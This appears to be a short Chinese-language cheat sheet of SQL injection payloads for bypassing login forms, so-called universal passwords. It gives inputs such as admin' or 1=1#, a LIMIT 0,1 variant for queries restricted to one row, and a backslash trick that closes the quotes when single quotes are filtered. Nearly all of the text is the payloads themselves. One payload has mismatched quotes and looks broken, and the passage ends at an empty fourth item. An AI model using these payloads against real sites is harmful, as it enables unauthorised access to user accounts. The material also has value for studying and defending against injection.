1、后端SQL语句为:SELECT * FROM users WHERE username=' ' AND password=' ';
那么我们可以构造payload为:(如下是万能密码,返回的数据为全部结果。)
1、 Username=(admin' or '1'=1'# ) ----- Password=(随便写)
2、Username=(admin' or 1=1# ) ------- Password=(随便写)
3、Username=(admin' or '1'='1 ) ---- Password=(admin' or '1'='1 )
2、如果返回结果做了限制,只能返回一条结果。
那么我们可以构造payload为:
1、Username=(admin' or 1=1 limit 0,1# ) ---- Password=(随便填)
3、如果sql语句查询过滤了单引号,那么我们可以使用转义username后面的第二个单引号,那么username第一个单引号
就和password第一个单引号闭合了。
就像这样:username='' and password=' ==== >> username='\' and password=' or 1=1#
我们可以这样构造payload为:
1、Username=( \ ) ------ Password=( ' or 1=1# )
4、